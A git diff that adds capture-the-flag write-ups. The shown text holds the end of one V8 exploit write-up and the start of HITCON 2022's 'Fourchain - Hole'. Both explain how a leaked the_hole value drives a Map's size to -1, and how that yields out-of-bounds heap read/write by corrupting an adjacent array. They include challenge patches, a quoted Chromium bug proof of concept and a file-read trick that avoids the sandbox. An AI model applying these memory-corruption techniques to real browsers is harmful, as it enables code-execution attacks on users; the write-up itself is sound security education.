+ StoreObjectFieldNoWriteBarrier(table,
+ OrderedHashMap::NumberOfElementsOffset(),
+ SmiAdd(number_of_elements, SmiConstant(1)));
+}
+
+
+
After setting number_of_elements to -1 the exploit inserts (0x10, -1) into the table. number_of_buckets is 2 which is the default for new tables. number_of_deleted is 0 because the table got shrunk twice (visible in the memory dump from the previous point), so occupancy will also be -1. The newly-inserted entry is 3 words long and is stored at table[3 + number_of_buckets + occupancy * 3] which in this case is equal to table[2]. That means that the key (0x10) will overwrite the bucket count. The value (-1) will overwrite the pointer to the first bucket, which is fine because -1 indicates an empty bucket. Finally, the element count is incremented, to 0.
+
+
Next, the exploit inserts (a, 0xffff) into the table. This time occupancy is 0 but number_of_buckets is 16, so the new entry gets written at table[19], which is 3 words after the end of the table. This works and doesn’t crash because the code stores the entries with UnsafeStoreFixedArrayElement, which does not emit a bounds check. So even though the length of the FixedArray that backs the table is known, it’s not checked when inserting new elements.
+
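The index arithmetic for the two inserts can be checked with a small model. This is only a sketch, not V8 code: `entryIndex` and `tableLength` are hypothetical helpers. The first mirrors the `table[3 + number_of_buckets + occupancy * 3]` formula from the builtin above, and the second assumes that the capacity is twice the bucket count, which gives a backing array of `3 + number_of_buckets * 7` elements.

```js
// Hypothetical helpers modelling the OrderedHashMap index arithmetic.
const HASH_TABLE_START_INDEX = 3; // element count, deleted count, bucket count
const ENTRY_SIZE = 3;             // key, value, chain

// Index at which StoreOrderedHashMapNewEntry writes the key of a new entry.
function entryIndex(numberOfBuckets, occupancy) {
  return HASH_TABLE_START_INDEX + numberOfBuckets + occupancy * ENTRY_SIZE;
}

// Number of elements in the backing FixedArray, assuming
// capacity = 2 * numberOfBuckets (an assumption of this sketch).
function tableLength(numberOfBuckets) {
  const capacity = 2 * numberOfBuckets;
  return HASH_TABLE_START_INDEX + numberOfBuckets + capacity * ENTRY_SIZE;
}

// First insert: 2 buckets and occupancy -1, so the key lands on table[2].
const firstInsert = entryIndex(2, -1);
// Second insert: the bucket count is now 0x10 and occupancy is 0.
const secondInsert = entryIndex(0x10, 0);

console.log(firstInsert, secondInsert, tableLength(2)); // prints: 2 19 17
```

Under these assumptions the real table only has indices 0 to 16, so the second insert starts at table[19], the third word past its end.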
+
The exploit allocates a JavaScript array right after the map, so the new entry will be written 8 bytes into the object that represents this array. The memory layout of a JSArray is the following:
+
+
map: Map
+properties_or_hash: FixedArray
+elements: FixedArray
+length: Number
+
+
+
The inserted pair overwrites elements with the address of the array itself and length with 0xffff. This gives us an arbitrary out-of-bounds read and write on the JavaScript heap.
+
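To see why the key ends up in elements and the value in length, the overlap can be modelled as follows. This is a sketch under stated assumptions: 4-byte compressed tagged words, a 2-bucket table whose backing array has 17 elements, and a JSArray placed immediately after it. `fieldAt` is a hypothetical helper, not a V8 function.

```js
// Assumptions of this sketch: compressed 4-byte tagged words, a backing
// array of 17 elements, and a JSArray allocated directly after the table.
const TAGGED_SIZE = 4;
const TABLE_LENGTH = 17;
const JS_ARRAY_FIELDS = ["map", "properties_or_hash", "elements", "length"];

// Returns the JSArray field hit by a write to table[index], or null if the
// write does not land on one of the four fields listed above.
function fieldAt(index) {
  const wordsPastEnd = index - TABLE_LENGTH;
  return JS_ARRAY_FIELDS[wordsPastEnd] ?? null;
}

const entryStart = 19; // where the (a, 0xffff) entry is written
const hits = {
  key: fieldAt(entryStart),       // "elements"
  value: fieldAt(entryStart + 1), // "length"
  chain: fieldAt(entryStart + 2), // null: past the four fields
};
const byteOffset = (entryStart - TABLE_LENGTH) * TAGGED_SIZE; // 8

console.log(hits, byteOffset);
```

In this model the chain word of the entry is written just past the four listed fields, so it lands on whatever follows the array header.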
+
V8 Sandbox
+
+
Recent versions of V8 enable the V8 sandbox by default. The goal of the V8 sandbox is to prevent an attacker that has gained arbitrary read and write on the JavaScript heap from corrupting other memory and getting arbitrary code execution in the V8 process. To get the flag we either need to find a bypass for the sandbox, or find a way to get the flag into the sandbox instead.
+
+
As luck would have it, d8 has a function that does exactly that, and the author’s patch doesn’t remove it from the globals.
+
+
d8 exposes a Realm object which has a function called Realm.eval that can load other JavaScript files. The implementation is here and calls Shell::ReadSource, which in turn calls Shell::ReadFile. This doesn’t directly give us access to the contents of the file that we’re loading but it will still load its contents onto the JavaScript heap, where we can read it using our OOB array. This completely bypasses the need for a V8 sandbox escape as long as we know where the flag is located. By reading /etc/passwd we can see that there is a user called ctf on the server, so we can try /home/ctf/flag. By sheer luck our guess was correct and we could use this method to read the flag.
+
+
+
+
+
+
+
diff --git a/HITCON-2022/pwn/fourchain-hole.md b/HITCON-2022/pwn/fourchain-hole.md
new file mode 100755
index 0000000..a8e6204
--- /dev/null
+++ b/HITCON-2022/pwn/fourchain-hole.md
@@ -0,0 +1,487 @@
+# Fourchain - Hole
+
+**Authors:** [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags:** pwn, browser, v8
+
+**Points:** 268
+
+> There's a hole in the program ?
+> Well I'm sure it's not that of a big deal, after all it's just a small hole that won't do any damage right ?
+> ... Right 😨 ?
+
+## Analysis
+
+NOTE: this writeup assumes some familiarity with V8 internals such as how objects are laid out in memory, pointer compression, and pointer tagging.
+
+The challenge gives us a patched d8, built from V8 commit `63cb7fb817e60e5633fb622baf18c59da7a0a682`. There are two patch files included in the challenge:
+
+`add_hole.patch`
+```diff
+diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
+index 6e0cd408e7..aafdfb8544 100644
+--- a/src/builtins/builtins-array.cc
++++ b/src/builtins/builtins-array.cc
+@@ -395,6 +395,12 @@ BUILTIN(ArrayPush) {
+ return *isolate->factory()->NewNumberFromUint((new_length));
+ }
+
++BUILTIN(ArrayHole){
++ uint32_t len = args.length();
++ if(len > 1) return ReadOnlyRoots(isolate).undefined_value();
++ return ReadOnlyRoots(isolate).the_hole_value();
++}
++
+ namespace {
+
+ V8_WARN_UNUSED_RESULT Object GenericArrayPop(Isolate* isolate,
+diff --git a/src/builtins/builtins-collections-gen.cc b/src/builtins/builtins-collections-gen.cc
+index 78b0229011..55aaaa03df 100644
+--- a/src/builtins/builtins-collections-gen.cc
++++ b/src/builtins/builtins-collections-gen.cc
+@@ -1763,7 +1763,7 @@ TF_BUILTIN(MapPrototypeDelete, CollectionsBuiltinsAssembler) {
+ "Map.prototype.delete");
+
+ // This check breaks a known exploitation technique. See crbug.com/1263462
+- CSA_CHECK(this, TaggedNotEqual(key, TheHoleConstant()));
++ //CSA_CHECK(this, TaggedNotEqual(key, TheHoleConstant()));
+
+ const TNode table =
+ LoadObjectField(CAST(receiver), JSMap::kTableOffset);
+diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
+index 0e98586f7f..28a46f2856 100644
+--- a/src/builtins/builtins-definitions.h
++++ b/src/builtins/builtins-definitions.h
+@@ -413,6 +413,7 @@ namespace internal {
+ TFJ(ArrayPrototypeFlat, kDontAdaptArgumentsSentinel) \
+ /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */ \
+ TFJ(ArrayPrototypeFlatMap, kDontAdaptArgumentsSentinel) \
++ CPP(ArrayHole) \
+ \
+ /* ArrayBuffer */ \
+ /* ES #sec-arraybuffer-constructor */ \
+diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
+index 79bdfbddcf..c42ad4c789 100644
+--- a/src/compiler/typer.cc
++++ b/src/compiler/typer.cc
+@@ -1722,6 +1722,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
+ return Type::Receiver();
+ case Builtin::kArrayUnshift:
+ return t->cache_->kPositiveSafeInteger;
++ case Builtin::kArrayHole:
++ return Type::Oddball();
+
+ // ArrayBuffer functions.
+ case Builtin::kArrayBufferIsView:
+diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
+index 9040e95202..a77333287a 100644
+--- a/src/init/bootstrapper.cc
++++ b/src/init/bootstrapper.cc
+@@ -1800,6 +1800,7 @@ void Genesis::InitializeGlobal(Handle global_object,
+ Builtin::kArrayPrototypeFindIndex, 1, false);
+ SimpleInstallFunction(isolate_, proto, "lastIndexOf",
+ Builtin::kArrayPrototypeLastIndexOf, 1, false);
++ SimpleInstallFunction(isolate_, proto, "hole", Builtin::kArrayHole, 0, false);
+ SimpleInstallFunction(isolate_, proto, "pop", Builtin::kArrayPrototypePop,
+ 0, false);
+ SimpleInstallFunction(isolate_, proto, "push", Builtin::kArrayPrototypePush,
+
+```
+
+`d8_strip_global.patch`
+```diff
+diff --git a/src/d8/d8-posix.cc b/src/d8/d8-posix.cc
+index c2571ef3a01..e4f27cfdca6 100644
+--- a/src/d8/d8-posix.cc
++++ b/src/d8/d8-posix.cc
+@@ -734,6 +734,7 @@ char* Shell::ReadCharsFromTcpPort(const char* name, int* size_out) {
+ }
+
+ void Shell::AddOSMethods(Isolate* isolate, Local os_templ) {
++/*
+ if (options.enable_os_system) {
+ os_templ->Set(isolate, "system", FunctionTemplate::New(isolate, System));
+ }
+@@ -748,6 +749,7 @@ void Shell::AddOSMethods(Isolate* isolate, Local os_templ) {
+ FunctionTemplate::New(isolate, MakeDirectory));
+ os_templ->Set(isolate, "rmdir",
+ FunctionTemplate::New(isolate, RemoveDirectory));
++*/
+ }
+
+ } // namespace v8
+diff --git a/src/d8/d8.cc b/src/d8/d8.cc
+index c6bacaa732f..63b3c9c27e8 100644
+--- a/src/d8/d8.cc
++++ b/src/d8/d8.cc
+@@ -3266,6 +3266,7 @@ static void AccessIndexedEnumerator(const PropertyCallbackInfo& info) {}
+
+ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
+ Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
++ /*
+ global_template->Set(Symbol::GetToStringTag(isolate),
+ String::NewFromUtf8Literal(isolate, "global"));
+ global_template->Set(isolate, "version",
+@@ -3284,6 +3285,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
+ FunctionTemplate::New(isolate, ReadLine));
+ global_template->Set(isolate, "load",
+ FunctionTemplate::New(isolate, ExecuteFile));
++ */
+ global_template->Set(isolate, "setTimeout",
+ FunctionTemplate::New(isolate, SetTimeout));
+ // Some Emscripten-generated code tries to call 'quit', which in turn would
+@@ -3456,6 +3458,7 @@ Local Shell::CreateSnapshotTemplate(Isolate* isolate) {
+ }
+ Local<ObjectTemplate> Shell::CreateD8Template(Isolate* isolate) {
+ Local<ObjectTemplate> d8_template = ObjectTemplate::New(isolate);
++ /*
+ {
+ Local file_template = ObjectTemplate::New(isolate);
+ file_template->Set(isolate, "read",
+@@ -3538,6 +3541,7 @@ Local Shell::CreateD8Template(Isolate* isolate) {
+ Local(), 1));
+ d8_template->Set(isolate, "serializer", serializer_template);
+ }
++ */
+ return d8_template;
+ }
+```
+
+The second patch, `d8_strip_global.patch`, simply removes some builtin functions that programs running in d8 normally have access to. These functions let a JavaScript program do things like open and read files, and they would trivialize the challenge if our exploit could use them. This is pretty standard for V8 challenges.
+
+The first patch, `add_hole.patch`, is the interesting part. It adds a new method called `hole` to `Array.prototype`. The new method is implemented as a C++ builtin, in the function `ArrayHole`. The function doesn't do much, and just returns a special value called `the_hole`.
+
+`the_hole` in V8 is a special object that the engine uses internally to represent the absence of a value. For example, when a JavaScript program creates a sparse array, V8 stores `the_hole` in all uninitialized array slots.
+
+```js
+const a = [1, 2];
+a[9] = 3;
+%DebugPrint(a);
+```
+
+```
+DebugPrint: 0x2ef200108b7d: [JSArray]
+ - elements: 0x2ef200108b8d [HOLEY_SMI_ELEMENTS]
+ - length: 10
+ - elements: 0x2ef200108b8d {
+ 0: 1
+ 1: 2
+ 2-8: 0x2ef200002459
+ 9: 3
+ 10-30: 0x2ef200002459
+ }
+```
+
+`the_hole` is an implementation detail that is not part of the JS standard and is normally invisible to JS code. For example, if a program tries to access a slot that contains `the_hole` in a sparse array, the access returns `undefined` and not `the_hole`.
+
+```js
+const a = [1, 2];
+a[9] = 3;
+console.log(a[8]);
+```
+```
+undefined
+```
+
+The author's patch adds a way to get a reference to this normally inaccessible object from JS code. This is interesting from a security perspective because it's likely that many of the built-in functions don't expect to be passed `the_hole` as an argument and might misbehave when that happens. For example the following snippet crashes d8:
+
+```js
+const the_hole = [].hole();
+the_hole.toString()
+```
+
+The patch also comments out some code that references [a bug](https://bugs.chromium.org/p/chromium/issues/detail?id=1263462) in Chromium's bug tracker. The bug describes how a reference to `the_hole` can be used to cause memory corruption.
+
+> It appears that a leaked TheHole value can be used to cause memory corruption due to special handling of TheHole values in JSMaps:
+>
+> ```js
+> var map = new Map();
+> map.set(1, 1);
+> map.set(hole, 1);
+> // Due to special handling of hole values, this ends up setting the size of the map to -1
+> map.delete(hole);
+> map.delete(hole);
+> map.delete(1);
+>
+> // Size is now -1
+> //print(map.size);
+>
+> // Set values in the map, which presumably ends up corrupting data in front of
+> // the map storage due to the size being -1
+> for (let i = 0; i < 100; i++) {
+> map.set(i, 1);
+> }
+>
+> // Optionally trigger heap verification if the above didn't already crash
+> //gc();
+> ```
+>
+> I haven't verified exactly why this happens, but my guess is that because the TheHole value is used by JSMaps to indicate deleted entries [8], when the code deletes TheHole for the second time, it effectively double-deletes an entry and so decrements the size twice.
+> [8] https://source.chromium.org/chromium/chromium/src/+/main:v8/src/builtins/builtins-collections-gen.cc;l=1770;drc=1c3085e26a408adb53645f9b5d12fa9f3803df3c
+
+The check that the challenge author commented out was introduced in response to this bug and breaks the exploitation technique described above. This makes it pretty clear that that's how the author wants us to solve the challenge.
+
+## Exploitation
+
+The exploit described in the Chromium bug uses `the_hole` to set the length of a JavaScript map to -1. To understand what primitives that gives us, we first have to find the code that implements the map object and understand how it works.
+
+`JSMap`, the C++ object that represents a JavaScript map, is declared in [`js-collection.tq`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-collection.tq;l=11;drc=f30f4815254b8eed9b23026ea0d984d18bb89c28) and is basically the same as a `JSCollection`. `JSCollection` only has one field, called `table`, which points to the backing hash table. Sadly the field has type `Object`, which can point to any JavaScript object. Not very useful. Looking for references to the generated method `JSCollection::table()` we find [some code](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/objects.cc;l=6556;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e) that indicates that `table` is actually of type [`OrderedHashMap`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/ordered-hash-table.h;l=306;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e). `OrderedHashMap` is itself a subclass of `OrderedHashTable`, which has a [detailed comment](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/ordered-hash-table.h;l=23;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e) describing how the contents of the table are laid out in memory. Cool!
+
+The memory layout of an `OrderedHashTable` (and `OrderedHashMap`) is this:
+
+```
+[0]: element count
+[1]: deleted element count
+[2]: bucket count
+[3..(3 + NumberOfBuckets() - 1)]: "hash table",
+ where each item is an offset into the
+ data table (see below) where the first
+ item in this bucket is stored.
+[3 + NumberOfBuckets()..length]: "data table", an
+ array of length Capacity() * 3,
+ where the first entrysize items are
+ handled by the derived class and the
+ item at kChainOffset is another entry
+ into the data table indicating the next
+ entry in this hash bucket.
+```
+
+In our case each element consists of two JavaScript values (the key and the value), so entrysize = 2 and each entry in the data table will be 3 words (12 bytes) long (key, value, next element).
+
+In some circumstances the runtime can decide to declare the `OrderedHashTable` obsolete and create a new version. For example, that can happen when too many elements are deleted from the table and the occupancy becomes too low. In that case the first word of the old table is not the element count but rather a pointer to the new `OrderedHashTable`. We can distinguish between the two by looking at the tag of the first word of the table. A Smi indicates that the table is active, and a pointer indicates that it's obsolete.
+
+The layout described above is also prefixed with a pointer to a [Map](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/map.h;l=203;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e) object and with the overall size of the table (in words, which in this case are 4 bytes). The table's total size is stored right after the `Map` pointer because `OrderedHashTable` derives from [`FixedArray`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/fixed-array.tq;l=8;drc=902759b8d72534a01d0f90d6653fd253885cf72f), which has a `length` field. I am pretty sure that this is redundant because the size of the `OrderedHashTable` is always equal to `3 + num_buckets * 7`, but maybe it is stored explicitly to help the GC.
+
+The value that the exploit in the Chromium bug sets to -1 is the element count (as we can see in the code [here](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/builtins/builtins-collections-gen.cc;l=1710;drc=63cb7fb817e60e5633fb622baf18c59da7a0a682), linked to in the bug). We can verify that this is the case by running the code from the Chromium bug and then printing the memory of the map in GDB.
+
+```js
+let hole = [].hole();
+let map = new Map();
+
+map.set(1, 1);
+map.set(hole, 1);
+map.delete(hole);
+map.delete(hole);
+map.delete(1);
+
+%DebugPrint(map);
+%SystemBreak();
+```
+```
+0x1f0400048c7d